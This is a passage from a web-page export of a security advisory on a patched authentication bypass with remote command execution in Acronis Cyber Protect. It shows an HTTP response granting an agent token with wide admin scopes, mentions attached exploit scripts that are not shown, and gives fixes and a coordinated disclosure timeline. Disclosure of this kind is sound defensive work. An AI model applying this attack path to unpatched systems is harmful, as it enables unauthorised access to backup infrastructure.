style=\"background: #263238; color: #ffcb6b;\">OK<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">13079<\/span>\n<span class=\"err\" style=\"background: #263238; color: #ff5370;\">[...]<\/span>{\"access_token\":\"eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoicE1nWHdKS[REDACTED:AT2]\",\"token_type\":\"bearer\",\"expires_in\":2591999,\"expires_on\":1646663799,\"id_token\":\"eyJhbGciOiJSUzI1[...]\",\"scope\":\"urn:acronis.com:tenant-id:alert_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:active_protection urn:acronis.com:tenant-id:policy_management:00000000-0000-0000-0000-000000000000:read urn:acronis.com:tenant-id:s3_storage:00000000-0000-0000-0000-000000000000:write urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:agent_core urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_registrar urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_unregistrar urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_viewer urn:acronis.com:tenant-id:apn:00000000-0000-0000-0000-000000000000:node urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_updater urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:unit_configuration_viewer urn:acronis.com:tenant-id:resource_management:00000000-0000-0000-0000-000000000000:read urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(self) urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_unit_metadata_updater urn:acronis.com:tenant-id:policy_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:cwl_requestor urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|x#ATP_*:consumer urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:host_uploader urn:acronis.com:tenant-id:accounts:00000000-0000-0000-0000-000000000000:licensing_viewer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:tenant_viewer urn:acronis.com:tenant-id:vault_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:resource_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:scan_agent urn:acronis.com:tenant-id:accounts:00000000-0000-0000-0000-000000000000:licensing_admin urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_*:issuer urn:acronis.com:tenant-id:monitoring:00000000-0000-0000-0000-000000000000:provider urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-agent urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:trusted_viewer urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:ou_uploader urn:acronis.com:tenant-id:credentials_store:00000000-0000-0000-0000-000000000000:consumer urn:acronis.com:tenant-id:dpm:00000000-0000-0000-0000-000000000000:statistics_uploader urn:acronis.com:tenant-id:software_inventory:00000000-0000-0000-0000-000000000000:data_uploader urn:acronis.com:tenant-id:storage:00000000-0000-0000-0000-000000000000:readonly urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_*:consumer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|SHI_VA:issuer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-downloader urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_BackupScan:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-scan-agent urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|x#ATP_BackupScan*:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:crs urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:consumer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:issuer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:viewer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:cyber-protect-service urn:acronis.com:tenant-id:frs:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:corp-wl:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:bitdefender-cleanset:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_host_info_modifier urn:acronis.com:tenant-id:protection:00000000-0000-0000-0000-000000000000:readwrite urn:acronis.com:tenant-id:credentials_store:00000000-0000-0000-0000-000000000000:owner urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:mms urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:restore_agent urn:acronis.com:tenant-id:storage:00000000-0000-0000-0000-000000000000:readwrite urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:sh-inventory urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|SHI_*:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:sync-unit urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:delegate urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:task-manager\"}<\/pre>\n<\/div>\n<p><strong>AT2<\/strong> inherits high privileges, as can already be observed at first glance via the returned <strong>scope<\/strong> parameter. Exemplary exploit paths are demonstrated within the attached \"acronis_pwn_agent.py\" and \"acronis_pwn_appliance.py\" scripts. With minor adjustments, these Python scripts can be used to automatically archive code execution on a remote Acronis Cyber Protect instance.<\/p>\n<p>[\/et_pb_text][et_pb_code _builder_version=\"4.25.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" width=\"83%\" module_alignment=\"center\"]<iframe loading=\"lazy\" width=\"560\" height=\"315\" src=\"https:\/\/www.youtube-nocookie.com\/embed\/UCHJmv4SFKE?si=V4HlvA6fDM5wTdJL\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>[\/et_pb_code][et_pb_text _builder_version=\"4.25.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<h3><span style=\"color: #86cccf;\">Fix<\/span><\/h3>\n<ol>\n<li>Anonymous registration should be disabled by default. This does not prevent attacks from already authenticated agents.<\/li>\n<li>Bearer tokens for agents should only be valid for the required functions of each agent. Their scope should be limited.<\/li>\n<\/ol>\n<h3><span style=\"color: #86cccf;\">References<\/span><\/h3>\n<ul>\n<li><a>https:\/\/cwe.mitre.org\/data\/definitions\/305.html<\/a><\/li>\n<li><a href=\"https:\/\/security-advisory.acronis.com\/advisories\/SEC-4092\" target=\"_blank\" rel=\"noopener\">https:\/\/security-advisory.acronis.com\/advisories\/SEC-4092<\/a><\/li>\n<li><a href=\"https:\/\/security-advisory.acronis.com\/advisories\/SEC-3855\" target=\"_blank\" rel=\"noopener\">https:\/\/security-advisory.acronis.com\/advisories\/SEC-3855<\/a><\/li>\n<li><a href=\"https:\/\/security-advisory.acronis.com\/updates\/UPD-2204-c1f8-7a8a\" target=\"_blank\" rel=\"noopener\">https:\/\/security-advisory.acronis.com\/updates\/UPD-2204-c1f8-7a8a<\/a><\/li>\n<\/ul>\n<h3><span style=\"color: #86cccf;\">Timeline<\/span><\/h3>\n<ul>\n<li><strong>2021-02-04<\/strong>: Vulnerability identified by Sandro Tolksdorf<\/li>\n<li><strong>2022-02-07<\/strong>: Initial contact via security@acronis.com<\/li>\n<li><strong>2022-02-08<\/strong>: Vulnerability is submitted via HackerOne<\/li>\n<li><strong>2022-04-22<\/strong>: Fixed by vendor<\/li>\n<li><strong>2022-11-08<\/strong>: The advisory is published in coordination with the vendor<\/li>\n<\/ul>\n<h1><span style=\"color: #86cccf;\">Credits<\/span><\/h1>\n<p>This security vulnerability was found by Sandro Tolksdorf of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2022-008 | Authentication Bypass with subsequent Remote Command Execution in Acronis Cyber Protect Advisory ID: usd-2022-0008 Product: Acronis Cyber Protect Affected Version: Server Version 15.0.28503 Vulnerability Type: Authentication Bypass (CWE-305) Security Risk: Critical Vendor URL: https:\/\/www.acronis.com\/en-us\/products\/cyber-protect\/ Vendor Status: Fixed CVE IDs: CVE-2022-3405, CVE-2022-30995 CVE Links: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-3405, https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30995 &nbsp;Introduction The Acronis Cyber Protect appliance, in its [&hellip;]<\/p>\n","protected":false},"author":109,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-19123","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/109"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=19123"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19123\/revisions"}],"predecessor-version":[{"id":22787,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19123\/revisions\/22787"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=19123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}